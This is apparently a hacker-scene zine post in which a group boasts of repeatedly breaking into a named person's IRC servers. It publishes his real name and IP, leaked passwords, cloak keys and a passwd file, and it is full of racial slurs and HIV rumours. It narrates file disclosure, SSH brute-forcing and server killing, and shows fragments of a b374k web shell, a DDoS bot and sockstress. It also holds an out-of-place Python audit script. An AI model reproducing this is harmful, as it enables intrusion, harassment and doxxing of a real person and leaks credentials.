Roto-Rooted Bi-Weekly
The Story of Hann
EllyEl8 & The SilverLords

Some call him Michael Dean Major, Jr. Others know him as hann aka marcdoubt aka patton aka niggered aka roughly a million other nicks. No matter what name you know him as, you'll know he's a total louse and he has been a scab on the scene for months and months!
He has been expunged from every group he has attempted to brown-nose his way into because he is a lying, self-aggrandizing, thief, know-nothing, meanie junky who couldn't hold HTP's jockstrap (even though he did for a few months, sadly).

After being brutally destroyed in DoxBin6, our hapless hero realized that ultimately, he couldn't keep away from the "scene" (whatever that is). He announced to the world that he was "BACC"! People gathered around, and then we got to watch him convulse on TinyChat, shooting up some black tar heroin and mumbling incoherent ebonics. He's such a classy guy~

Once Stage One of his super-ultimate plan had been completed, he launched himself into Stage Two with a cunning rivalled only by slightly retarded monkeys. He dropped names and licked ass, but failed to get into any groups, mostly because nobody is enough of a silly goose to mistake schizophrenic blogging literally sprinkled with nicks everyone knows for actual skill.

It wasn't over, though. Hann knew the scene needed him. It needed a champion! And so he gathered a group of super-talented scene titans! #SEVENSSSSSSS was born; his very own crew of xbox-live skids, try-hard rappers, and swatters! #SEVENSSSSSSS~

Little did he know that the SilverLords had been paying close attention and with our mighty Brazilian powers combined were able to own him thrice in as many weeks.

HAhaeuheAUHEaleAHUEHAuaheauaAUAhehAh ekkekEK EKkekekeKEk hAHuehaelLEEle;KEkEKkEK

= 2014-02-02 21:13 <~marc> 3rd time i ever set up unreal+anope

Gee, I wonder why? Let's explore...
-==========================================================-
-=== Exhibit A: vps.schoolofprivacy.eu ====================-
-==========================================================-

<~sevens> this server is
<~sevens> soooooooooooooooooooooooooo
<~sevens> secure
<~sevens> like u have no idea how hard i worked
<~sevens> before i even
<~sevens> made ircd a user
<~sevens> from ground up

So, you've started the most elite hacker group in town, but you have no servers or money to speak of, what do you do? If you have anything like the skillset of Mister Michael Dean Major you will pucker up your lips and suck every cock in town for a free shared shell to build your budding IRC network on.

Now that you've acquired a secure base, we need to set up our IRC network. Any true SilverLord knows that compartmentalization is key in maintaining your network's security. Hann knows this, so he tells everyone that they have individualized onions (don't leak lol!), but a 12 line bash script is too much effort so fuck it, we'll skip the implementation (none of your friends would betray you, anyway, right?). Next step is to bind all the ports to localhost, he skips this too, since he knows that nobody likes him enough to go through the effort of reconfiguring their IRC clients to connect to Tor hidden services.

So, since we have the clearnet address of his box, the logical step is to start probing services! He's got some gross web apps running, but one of these had a cute LFD we were able to leverage to enumerate the usernames from /etc/passwd. When we pull out our handy-dandy SSH bruteforcer we find that we have access to 3 (Golly!) different user accounts on the box. Logging into the box and running "ps faux" reveals this fine example of stellar adminning:

root 31833 ?     Jan16 0:03 /usr/sbin/sshd -D
root 14338 ?     Jan17 0:02  \_ sshd: patton@pts/0
root 14351 pts/0 Jan17 0:00  |   \_ -bash
ircd 14527 pts/0 Jan17 0:00  |       \_ su ircd
ircd 14528 pts/0 Jan17 0:00  |           \_ bash
root 14611 pts/0 Jan17 0:00  |               \_ su patton
root 14612 pts/0 Jan17 0:00  |                   \_ bash
ircd 14701 pts/0 Jan17 0:00  |                       \_ su ircd
ircd 14702 pts/0 Jan17 0:00  |                           \_ bash
root 24417 pts/0 Jan18 0:00  |                               \_ su patton
root 24418 pts/0 Jan18 0:00  |                                   \_ bash

As all good admins know, leaving everyone's home directories with global read permissions is paramount to security. Following this principle, we were able to copy ircd.tar.gz from /home/ircd, which what do you know, has Anope databases in it! Using our very own Brazilian Anope database parser we find that "nigg"'s (hann appears to think he's black) NickServ password is "hitlist1", which also happens to be the password for the ircd user account on the box!

After much rejoicing, we mined all of the logs from his bots (very ethical, Mister Dean) and proceeded to hackily hook his IRCd. Being slightly impatient, we decided to go ahead and restart the IRCd and see if he didn't notice. This nets us his oper hash, "datgoodgreen" (more wigger shit).

~ # grep -Ei "(oper|identify)" log
BOPM: ns identify pass123
BOPM: OPER nigg datgoodgreen
BOPM: JOIN #oper
rory: JOIN #opers
rory: MODE #opers
rory: MODE #opers
rory: oper nigg datgoodgreen
rory: PRIVMSG nickserv :identify hitlist1
nc: JOIN #opers
nc: MODE #opers
~ #

Unfortunately, hann was wide awake on a cocaine binge and noticed the IRCd restart right away, but after finding us in nearly every user account on the box despite his best attempts at expunging us (deleting /tmp/) he decided he should reformat it.

Happily for Melly, hann really enjoyed the Unreal hook:

but he did leave me a nice unreal hook to steal

Thanks hann! Guess we'll share with the class:

FILE *f = fopen("log", "a+");
fprintf(f, "%s: %s\n", (*cptr->name ? cptr->name : "*"), cptr->buffer);
fclose(f);

Anyone with half a brain and ten minutes could come up with something better, but that's hann for you, he can't do any original work so he just steals everything he can find. RIP #SEVENSv1.

heaheuHAUhuaheuswuAUhaHUEaHUTHHTHTht kekkekekkeaf

Let's check out his unrealircd.conf:

ircd@vps.schoolofprivacy.eu:~$ cat Unreal/Unreal3.2/unrealircd.conf
# For *NIX, uncomment these 2 lines:
loadmodule src/modules/commands.so;
loadmodule src/modules/cloak.so;
include "aliases/anope.conf";
# For WINDOWS, uncomment these 2 lines:
#loadmodule modules/commands.dll;
#loadmodule modules/cloak.dll;
listen 127.0.0.1:6669;
link Chippy1337.seve.ns.gov {
    username *;
    hostname 127.0.0.1;
    bind-ip 127.0.0.1;
    port 6669;
    hub qaeda.seve.ns.gov;
    password-connect "dickshit";
    password-receive "dickshit";
    class default;
};
# ME block [REQUIRED]
me {
    # Server name
    name "Seve.ns";
    # Server description
    info "(Al-Qaeda Label)";
    # Server numeric. Must be between 1 and 255.
    # This number must be unique among the servers in the network.
    numeric 100;
};
tld {
    mask *@*;
    motd services.motd;
    rules rules.motd;
    shortmotd services.motd;
    opermotd services.motd;
    botmotd services.motd;
    options { ssl; };
};
# ADMIN block [REQUIRED]
admin {
    # Anything can go in this block, most people just put their nick and email.
    "Nick: rory";
    "Email: rory@nsa.gov";
};
# CLASS block [RECOMMENDED]
class clients {
    # How often do we ping clients?
    pingfreq 90;
    # How many clients should this class hold?
    maxclients 500;
    options { nofakelag; };
    # How much are they allowed to send or receive at one time?
    sendq 100000;
    recvq 8000;
};
# ALLOW block [REQUIRED]
allow {
    # Host OR IP to match. Note this is OR not AND!
    ip *@*;
    hostname *@*;
    maxperip 100;
    # What class do these users go into?
    class clients;
};
# LISTEN block [REQUIRED]
# You can have as many of these as you want.
# The syntax is: listen :port;
listen *:6667;
listen *:6697 { options { ssl; clientsonly; }; };
listen *:7000 { options { ssl; serversonly; }; };
listen *:9899 { options { ssl; serversonly; }; };
listen *:9890 { options { ssl; serversonly; }; };
set {
    modes-on-connect "+ixw";
    modes-on-oper "+bxwgs";
    oper-auto-join "#opers";
    anti-spam-quit-message-time 10s;
    oper-only-stats "okfGsMRUEelLCXzdD";
    throttle { connections 60; period 60s; };
};
# OPER block [RECOMMENDED]
# You can have as many oper blocks as you want.
oper nigg {
    class clients;
    from { userhost *@*; };
    password "$Pw6tGPMk$i8ZwNi/4YQcuQ5IgecEaGkikhCw=" { sha1; };
    flags oOCAaNrDRwgcLkKbBnGztZWHvqXFd;
    swhois "SEVENS";
    snomask fkvGnNqsSocF;
};
oper nc {
    class clients;
    from { userhost *@*; };
    password "$Pw6tGPMk$i8ZwNi/4YQcuQ5IgecEaGkikhCw=" { sha1; };
    flags oOCAaNrDRwgcLkKbBnGztZWHvqXFd;
    swhois "SEVENS";
    snomask fkvGnNqsSocF;
};
# DRPASS block [RECOMMENDED]
drpass {
    # Password for /restart
    restart "plz-restart";
    # Password for /die
    die "die-you-stupid";
};
# LOG block [RECOMMENDED]
log ircd.log {
    # What is the biggest to let this file get?
    maxsize 5MB;
    # What do we want to log?
    flags {
        # For descriptions of these flags, see doc/unreal32docs.html
        errors; kills; tkl; connects; server-connects; oper;
        sadmin-commands; chg-commands; oper-override; spamfilter;
    };
};
# SET block [REQUIRED]
set {
    # Email address to give to banned users.
    kline-address "rory@nsa.gov";
    # How many channels each user may be in.
    maxchannelsperuser 10;
    # The default network server if this one is full.
    default-server none;
    # What is the name of the Services Server?
    services-server Chippy1337.seve.ns.gov;
    # What is the name of the network? NO SPACES!
    network-name Qae.da.Seve.ns;
    # Oper hosts for each oper level
    hosts {
        global "seve.ns";
        coadmin "coadmin.seve.ns";
        admin "admin.seve.ns";
        servicesadmin "csops.seve.ns";
        netadmin "wow.qae.da.seve.ns";
        host-on-oper-up "yes";
    };
    options { hide-ulines; flat-map; fail-oper-warn; show-connect-info; };
    # Where do people go for help?
    help-channel "#help";
    # What to put in front of cloaked hosts
    hiddenhost-prefix "Special-Agent";
    # Keys to cloak the host with. THESE SHOULD BE KEPT SECRET!111!1
    # These keys must be the same on all servers in the network.
    cloak-keys {
        "AFXn01nlcH47532khx0xcoP4PI2C";
        "4HT7rj7D6HY757Tc";
        "n0orN3ilcJTi8CFQFX";
    };
};
ulines {
    Chippy1337.seve.ns.gov;
    zalgo.irc.cuteis.us;
    ramnode.cuteis.us;
    pro.cuteis.us;
    frack.cuteis.us;
    scout.cuteis.us;
};
ircd@vps.schoolofprivacy.eu:~$ # DOES /bin/nologon MEAN NOTHING TO YOU?
ircd@vps.schoolofprivacy.eu:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:104:106:MySQL Server,,,:/nonexistent:/bin/false
quasselcore:x:105:108::/var/lib/quassel:/bin/false
r00t:x:1000:1000::/home/r00t:/bin/sh
sutler:x:1001:1001:sutler,1,1,1,1:/home/sutler:/bin/bash
jammy:x:1002:1002:1,1,1,1,1:/home/jammy:/bin/bash
kenose:x:1003:1003:1,1,1,1,1:/home/kenose:/bin/bash
josh:x:1004:1004:,,,:/home/josh:/bin/bash
bitlbee:x:106:109::/var/lib/bitlbee/:/bin/false
danny:x:1005:1005:1,,,:/home/danny:/bin/bash
spyco:x:1008:1008:,,,:/home/spyco:/bin/bash
freedomhacker:x:1009:1009:,,,:/home/freedomhacker:/bin/bash
postfix:x:107:110::/var/spool/postfix:/bin/false
narwaal:x:1010:1010:,,,:/home/narwaal:/bin/bash
meep:x:1007:1007:,,,:/home/meep:/bin/bash
patton:x:0:1011:,,,:/home/patton:/bin/bash
znc:x:1011:1012:,,,:/home/znc:/bin/bash
brr:x:1012:1013:brr,,,,cute:/home/brr:/bin/bash
hav0c:x:1013:1014:,,,:/home/hav0c:/bin/bash
nc:x:1015:1015:,,,:/home/nc:/bin/bash
ircd:x:1006:1016:,,,:/home/ircd:/bin/bash
debian-tor:x:108:112::/var/lib/tor:/bin/bash

How about some Anope passwords?

In the end, we only got to run amuck in the box for a couple of hours (._____.). Since hann couldn't handle the SilverLords, he had to concede defeat and delete fucking everything! Of course, hann suffers from delusions of grandeur and cannot be defeated, so to hann this is a victory against the chatters! Everybody wins! Yaaaaaaay!
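The account problems this exhibit describes (a second UID 0 entry, daemon accounts with login shells, home directories readable by every local user) can be checked mechanically. The following Python audit is an added example, not part of the original zine; the function names, the 1000 UID cutoff and the sample passwd text are assumptions made for illustration.

```python
"""Account-hygiene audit for the problems visible in Exhibit A (added example)."""
import os
import stat
from dataclasses import dataclass

# Shells that refuse interactive logins on Debian-style systems.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
                  "/usr/bin/false", "/bin/sync"}
FIRST_HUMAN_UID = 1000   # assumption: Debian's default UID_MIN
NOBODY_UID = 65534


@dataclass(frozen=True)
class Account:
    name: str
    uid: int
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) text into Account records; malformed lines raise."""
    accounts = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, _gid, _gecos, home, shell = fields
        accounts.append(Account(name, int(uid), home, shell))
    return accounts


def audit_accounts(accounts, service_names=()):
    """Return (account, finding) pairs in file order.

    service_names lists daemon accounts that were created with adduser and
    therefore sit in the human UID range (the ircd and znc users in the
    listing); UID alone cannot identify those.
    """
    findings = []
    for acct in accounts:
        if acct.uid == 0 and acct.name != "root":
            # A second UID 0 entry is root under another name.
            findings.append((acct.name, "uid0-alias"))
            continue
        is_service = (0 < acct.uid < FIRST_HUMAN_UID
                      or acct.uid == NOBODY_UID
                      or acct.name in service_names)
        # An empty shell field means /bin/sh, so it counts as a login shell.
        if is_service and acct.shell not in NOLOGIN_SHELLS:
            findings.append((acct.name, "service-login-shell"))
    return findings


def exposed_homes(base="/home"):
    """Return (dirname, octal mode) for homes other users can read or enter."""
    exposed = []
    with os.scandir(base) as entries:
        for entry in entries:
            if not entry.is_dir(follow_symlinks=False):
                continue
            mode = stat.S_IMODE(entry.stat(follow_symlinks=False).st_mode)
            if mode & (stat.S_IROTH | stat.S_IXOTH):
                exposed.append((entry.name, oct(mode)))
    return sorted(exposed)


# Constructed sample modelled on the listing above (the UID 0 account name is made up).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:104:106:MySQL Server,,,:/nonexistent:/bin/false
opsadmin:x:0:1011:,,,:/home/opsadmin:/bin/bash
ircd:x:1006:1016:,,,:/home/ircd:/bin/bash
debian-tor:x:108:112::/var/lib/tor:/bin/bash
"""

if __name__ == "__main__":
    for name, finding in audit_accounts(parse_passwd(SAMPLE_PASSWD), {"ircd"}):
        print(f"{finding:22} {name}")
    if os.path.isdir("/home"):
        for name, mode in exposed_homes("/home"):
            print(f"{'exposed-home':22} {name} ({mode})")
```

Home directories set to mode 0750 or 0700 drop out of the exposed_homes() result, and a daemon account whose shell is /usr/sbin/nologin drops out of audit_accounts().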
:D

Michael would have us believe that only two people hate him in the whole wide world, but he is about to find out that nobody likes him, he's just an Elly and Melly punching bag.

kekekkekkKEhAhAHhaeuEheuahUAHEhauHUAehuehuaheuUAHe

-==========================================================-
-=== Exhibit B: vps.schoolofprivacy.eu ... AGAIN?!?>! =====-
-==========================================================-

What if we were to tell you, that we did have an insider all along? Well, we totally did. One Glorious Knight of the SilverLord Roundtable had gained trust through disinformation, Mitnicking and juping peoples' nicks and credz. Good ol' hacking too. [Lord]IntangirTheGod managed to root the box with clever heckin' maneuvers and took it to it, grabbing everything that was great off the box, including hann's important research, which we will show in a minute. Then zeekill went and nulled the box before we could "tidy up the box" for him. OH WELL kekekKEHAhleahehUAUHEuahUAEHuehehauHAh. RIP #SEVENSv2.
root@priv11:~# cat /etc/shadow
root@priv11:~# cat .bash_history
apt-get update
apt-get dist-upgrade
vi /etc/rc.local
ls -lah
vi onboot.sh
chmod +x onboot.sh
:> /root/.mysql_history
:> /var/log/lastlog
:> /root/.bash_history
:> /var/log/wtmp
rm /etc/ssh/ssh_host_*_key{,.pub}
^^----WE AREN'T QUITE SURE IF THAT WORKED THERE, CHIEF LOL
ls /etc/ssh
:> /root/.mysql_history
:> /var/log/lastlog
:> /root/.bash_history
:> /var/log/wtmp
poweroff
su ircd
apt-get isntall screen
apt-get install screen
apt-get install libxml2-dev libxslt-dev
apt-get install python-lxml
screen
adduser sevens
nano /etc/passwd
uname -a;id
adduser ircd
passwd ircd
apt-get update
apt-get upgrade
apt-get kernel-update
apt-get upgrade
aptitude safe-upgrade
uname -a
uname -aid
uname -a;id
apt-get safe-upgrade
aptitude safe-upgrade
apt-get install build-essentials
apt-get install build-essential
hostname SOPriv
apt-get install tor
cd /etc/tor
ls
cd /var/lib/tor
ls
cd /etc/tor
ls
nano torrc
killall tor
tor
cd /var/lib/tor
ls
cd ./hidden_service/
ls
git glone https://github.com/katmagic/Shallot.git
apt-get install git
git clone https://github.com/katmagic/Shallot.git
ls
cd ./Shallot/
ls
./configure
apt-get isntall gcc
apt-get install gcc
./configure && make
apt-get install pen-ssl
apt-get install open-ssl
apt-get install ssllibs
apt-get install openssl
apt-get install libcurl4-openssl-dev
./configure && make
ls
./shallot
./shallot sevens
./shallot nojihad
cd -
rm private_key
nano private_key
killall tor
tor
nano hostname
cd /home/ircd/
su ircd
root@priv11:~# cat .ssh/id_rsa
root@priv11:~# cat .ssh/id_rsa.pub
root@priv11:/home/sevens# ls -lart
total 312
-rw-r--r-- 1 sevens sevens  39927 Jan 15 14:10 k.c
-rw-r--r-- 1 sevens sevens    675 Jan 21 00:43 .profile
-rw-r--r-- 1 sevens sevens   3486 Jan 21 00:43 .bashrc
-rw-r--r-- 1 sevens sevens    220 Jan 21 00:43 .bash_logout
drwx------ 2 sevens sevens   4096 Jan 21 00:45 .cache
drwx------ 3 sevens sevens   4096 Jan 21 00:46 .config
-rw-r--r-- 1 sevens sevens      0 Jan 22 17:37 .hushlogin
drwxr-xr-x 7 sevens sevens   4096 Jan 23 03:21 ..
drwxr-xr-x 2 sevens sevens   4096 Jan 23 03:37 .ssh
drwxr-xr-x 3 sevens sevens   4096 Jan 24 16:47 home
-rw-r--r-- 1 sevens sevens  57546 Jan 26 13:15 b374k.php
-rw-r--r-- 1 sevens sevens 128270 Jan 26 14:46 b37.txt
drwx------ 2 sevens sevens   4096 Jan 26 16:36 .gnupg
-rw-r--r-- 1 sevens sevens  33715 Jan 26 21:23 .zcompdump
-rw------- 1 sevens sevens     16 Jan 30 14:35 .nano_history
drwxr-xr-x 7 sevens sevens   4096 Jan 30 17:43 .
-rw------- 1 sevens sevens    149 Jan 30 20:11 .bash_history
root@priv11:/home/sevens# cat .bash_history
df -h
grep "ALF" *
htop
df -h
cd /tmp
ls
rm -rf ALF.S01-S04.COMPLETE.DVDRip.XviD-SCC/ <----lelelelelelelelekakkakekoaekOKEAOakehaHAUHAUAH
df -h
nc irc.echonode.com 6667
last
cat /etc/passwd
who
w
last
^^^^^^ PARANOIA RUNS DEEP, INTO YOUR LIFE IT WILL SEEP

-==========================================================-
-=== /!\ WARNING INTENSIVE RESEARCH IN PROGRESS /!\ =======-
-==========================================================-

"I'm so glad I do real research and am not just a chatter." - Michael Dean Major, Jr.

root@priv11:/home/sevens# head k.c
/*******************************************************************************
 * This is a IRC based distributed denial of service client. It connects to *
 * the server specified below and accepts commands via the channel specified. *
 * The syntax is: *
 * ! *
 * You send this message to the channel that is defined later in this code. *
 * Where is the nickname of the client (which can include wildcards) *
 * and the command is the command that should be sent. For example, if you *
 * want to tell all the clients with the nickname starting with N, to send you *
 * the help message, you type in the channel: *
root@priv11:/home/sevens# lol
bash: lol: command not found
root@priv11:/home/sevens# head b374k.php
".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$b374k("7P1nm+M20igMf779K7RaH/f0qqdJUXnG3V4FKkukcrB9+mImxShGSbb/+wswiZTUPT1je8/e7/WMd2cohEKhUACqCkDVjz8ZovFdJvO99eJyZuYpk8UeK9nP8Lct2QoHU
root@priv11:/home/sevens# lolol
bash: lolol: command not found
root@priv11:/home/sevens# cd home
root@priv11:/home/sevens/home# ls -lart
total 80
-rw-r--r-- 1 sevens sevens  7139 Apr 16  2012 README.txt
-rw-r--r-- 1 sevens sevens   120 Apr 16  2012 Makefile
-rw-r--r-- 1 sevens sevens 16291 Apr 16  2012 sockstress.c
-rwxr-xr-x 1 sevens sevens   153 Apr 16  2012 drop_rst.sh
drwxr-xr-x 2 sevens sevens  4096 Apr 16  2012 payloads
-rw-r--r-- 1 sevens sevens  8980 Jan 24 16:46 sockstress.o
-rwxr-xr-x 1 sevens sevens 17036 Jan 24 16:46 sockstress
-rw-r--r-- 1 sevens sevens   110 Jan 24 16:47 irc
drwxr-xr-x 3 sevens sevens  4096 Jan 24 16:47 .
drwxr-xr-x 7 sevens sevens  4096 Jan 30 17:43 ..
root@priv11:/home/sevens/home# # oooh yeah here we go, hann's OHDAY PARTY TIME!
root@priv11:/home/sevens/home# head sockstress.c
/*
 * _____ ____ _____ _ __ _____ _______ _____ ______ _____ _____
 * / ____|/ __ \ / ____| |/ // ____|__ __| __ \| ____|/ ____|/ ____|
 * | (___ | | | | | | ' /| (___ | | | |__) | |__ | (___ | (___
 * \___ \| | | | | | < \___ \ | | | _ /| __| \___ \ \___ \
 * ____) | |__| | |____| . \ ____) | | | | | \ \| |____ ____) |____) |
 * |_____/ \____/ \_____|_|\_\_____/ |_| |_| \_\______|_____/|_____/
 *
 * CVE-2008-4609
 * https://defuse.ca/sockstress.htm
root@priv11:/home/sevens/home# # hann's 2k-h1p2c0de y0
root@priv11:/home/sevens/home# head drop_rst.sh
#!/bin/bash
if [ $# -eq 0 ] ; then
    echo "Usage: ./drop_rst.sh "
    exit 1
fi
iptables -A OUTPUT -p tcp --tcp-flags rst rst -d $1 -j DROP
root@priv11:/home/sevens/home# # NARY A CHAR WASTED WITH THIS BEAUT!

alright, let's take a look at this payloads dir... I'm sure this is where all his hardcore research goes...

root@priv11:/home/sevens/home/payloads# ls -lart
total 24
-rw-r--r-- 1 sevens sevens  130 Apr 16  2012 smtp
-rw-r--r-- 1 sevens sevens   20 Apr 16  2012 http
-rw-r--r-- 1 sevens sevens   21 Apr 16  2012 dns_axfr
-rw-r--r-- 1 sevens sevens   29 Apr 16  2012 dns_a
drwxr-xr-x 2 sevens sevens 4096 Apr 16  2012 .
drwxr-xr-x 3 sevens sevens 4096 Jan 24 16:47 ..
root@priv11:/home/sevens/home/payloads# cat smtp
HELO gmail.com
MAIL FROM: foo@gmail.com
RCPT TO: victim@victim-domain.com
DATA
Subject: AAAAAAAAAAAAA
BBBBBBBBBBBBBBBBBBB
.
QUIT
root@priv11:/home/sevens/home/payloads# cat http
GET / HTTP/1.0
root@priv11:/home/sevens/home/payloads# cat dns_a
0waffle.co%
root@priv11:/home/sevens/home/payloads# cat dns_axfr
aaaaaaaaaaacomü%

-=== /!\ WARNING 0DAY DEV NOTES JUST RELEASED!! /!\ =======-
-=== /!\ GMAIL HACKER: CONFIRMED ETHICS BREACH! /!\ =======-

Starfall can u google how to backup .db files from here while i set modes rsync?
-OperServ- Unknown command rsync. "/msg OperServ HELP" for help.
... im gonna just act like that didnt happen everybody here is tired nobody saw that

-==========================================================-
-=== Exhibit C: /die /die /die my darlin ==================-
-==========================================================-

MellyEL8 posing as nachash in #opers on new network, dropping knowledge about 3 day old public exploit that hann just learned about, he asks how nachash knows? ...
hann reads comics. HANN SHIVERS HIS OWN TIMBERS HKEKEKKEKEKEkkekEKk < Global> ChanServ: marc!marc@pool-108-56-251-199.washdc.fios.verizon.net (level 10000) set access level 9 to chF (group chF) on channel #sevens < Global> ChanServ: marc!marc@pool-108-56-251-199.washdc.fios.verizon.net (level 10000) set access level 10 to chF (group chF) on channel #sevens < marc> ok nice < marc> ugh im getting < marc> too good @ this < marc> ircd backed up < marc> | wind < marc> kms sent me like < marc> 100 msgs last night < marc> iw as afk < marc> something about a POC for a grsec bypass < marc> if i read it right < marc> which is huge < Global> NickServ: wind!wind@localhost (e-mail: none) changed its password. < marc> | wind /hs on < marc> and /cycle in chans < marc> if u woul < marc> i like that vhost lol < wind> | it's probably the local 3.4 < wind> | that has no protections at all < marc> mayb < wind> | so there's nothing to bypass < marc> If you're running Linux 3.4 or newer and enabled < marc> CONFIG_X86_X32 , you need to disable it or update < marc> immediately; upstream vuln CVE-2014-0038 < marc> It doesn't get any more serious, nearly an arbitrary write which nothing (including grsecurity) will < marc> prevent exploitation of < marc> To give you an idea of the level of testing that went into X32 support, a syscall fuzzer trying random < marc> syscall numbers could have found this < marc> Yet it sat in the kernel for over a year and a half < marc> I would not be surprised to see an exploit for this within the next few days < marc> <@grsecurity> @awasi1001 Our latest test patch uploaded today contains the fix. The stable 3.2 tree is not affected. 
< marc> < marc> In case there's confusion, this vuln is not about 32bit userland on 64bit (CONFIG_X86_32), but the new X32 < wind> | it's just an arbitrary write primitive < wind> | yeah that's the one < wind> | there's already a shit fuck exploit for it < wind> | that barely compiles and takes 13 minutes to root < marc> who told u this < wind> | it's public knowledge < marc> | wind im reading comics < marc> got an awesome comic reader with .cbr files After hann got nulled by zee, he moved his irc to a new joint where we had onion access too (everyone else was connecting from a znc to a clearnet IP pool-108-56-251-199.washdc.fios.verizon.net). Anxious to get rid of the cretinous bottom feeder and be done with it, we made one final play: /nick'd up as our true selves [Lord]IntangirTheGod and hit the default kill switch "/die die-you-stupid" (fantastic administration, hann): = --- | You're now known as [Lord]IntangirTheGod = <~[Lord]IntangirTheGod> SHOUTS TO THE SILVERLORDS MOTHER FUCKERS = <~[Lord]IntangirTheGod> SHOUTS TO ELLYEL8 AND MELLYEL8 = <~[Lord]IntangirTheGod> In 2013, hann started telling close friends that he's been infected with [[GRIDS]] ever since the first time he tried heroin. Once this story inevitably spread, he changed his story by saying that he lied about having AIDS in order to gain sympathy and pandhandle money from these friends, because he's a shameless junkie piece of shit. It was originally proposed as a thought experiment that much like Schrodinger's Cat, hann could be thought to both be HIV positive and negative at the same time. It was later determined by a panel of duly elected dramacrats that actual infection by a retrovirus is irrelevant in hann's case - he has AIDS. = <~[Lord]IntangirTheGod> THERE'S A MESSAGE FROM THE REAL NACHASH TO YOU, MARC = <~[Lord]IntangirTheGod> bam bam bamBAM BAM! 
= <~marc> lol not funny = <~marc> scared me = <~[Lord]IntangirTheGod> AND YOU'RE = <~[Lord]IntangirTheGod> GONE = <~marc> chf Too late, hann, /die die-you-stupid was already sent. Your irc was delinked and you melted down, fucking hard: z: new fingerprint: D81F27FA 3B4EA990 0F0D1B29 52CBDE40 34066216 z: conversation is now off the record (untrusted!) z hey nac z you there, need to talk to you wind Hey z hey z sorry z irc z nachash z wtf is that about? z why'd you jupe the server? z wtf? z did someone hack your client? z something wrong? z what is that about dude? wind LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL wind yes hello wind IntangirTheGod here z wtf wind World's greatest nachash impersonator z uh what z ? z nac stop fucking around z wtf is all this about? wind hann status: brutally fucked with a rake by the almighty SilverLords z are u high wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind How does it feel wind to be stepped on like an insect wind by the world's greatest social engineer? wind tl;dr wind you got played like a cheap instrument wind from day 1 kiddo wind Is your face getting hot right about now? wind Nice to know what you really thought about me, btw z what? 
wind You could barely contain your enthusiasm for shit talking me as soon as you thought that I got owned z i dont have time for this wind I guess wind I need to spell it out z omg really i said all the things wind I'm Intangir, you doofus z i said to you in your face actually z if this is even not a sorry troll wind You're not good enough to scrape gum off of the real nachash's shoes z a lot of things didnt add up but i certainly wouldnt call pretending to be someone wind When you came back, he told me if I wanted to have a bit of fun wind to poke and prod you at will z and getting literally nothing but a server jupe out of it wind Oh, I got a bit more than that z ok well have fun lol wind btw z i have a lot more important things to deal with wind I rather enjoyed wind all the sha1s z if anything u just saw that i said the same things to him wind from your nickserv db z as i said to you z ok lol z a ns db? z cmon kid z this is depressing z go somewhere lol wind That's just the tip of the iceberg z that was pathetic z rip nachash z ok enjoy yaself young wind got that /etc/shadow from the old box too z oh wow z that will really z get u far wind btw wind in case of paste failure <-- z (z@zauris.ru) has quit (Leaving...) wind In 2013, hann started telling close friends that he's been infected with [[GRIDS]] ever since the first time he tried heroin. Once this story inevitably spread, he changed his story by saying that he lied about having AIDS in order to gain sympathy and pandhandle money from these friends, because he's a shameless junkie piece of shit. It was originally proposed as a thought experiment that much like wind Schrodinger's Cat, hann could be thought to both be HIV positive and negative at the same time. It was later determined by a panel of duly elected dramacrats that actual infection by a retrovirus is irrelevant in hann's case - he has AIDS. 
-- [z] is away: Offline
wind LOOOOOOOOOOOOL

-==========================================================-
-=== Epilogue: Less is more. More is more. ================-
-==========================================================-

And in conclusion, Michael's autism knows know bounds (this one is for you, NSA)!

$ curl http://chf.re/marc.txt

All of the data recovered from his boxes (and more!) can be found at: http://doxbinicsjqqmohl.onion/media/Hann_Wars_IV_-_A_New_Hope.tgz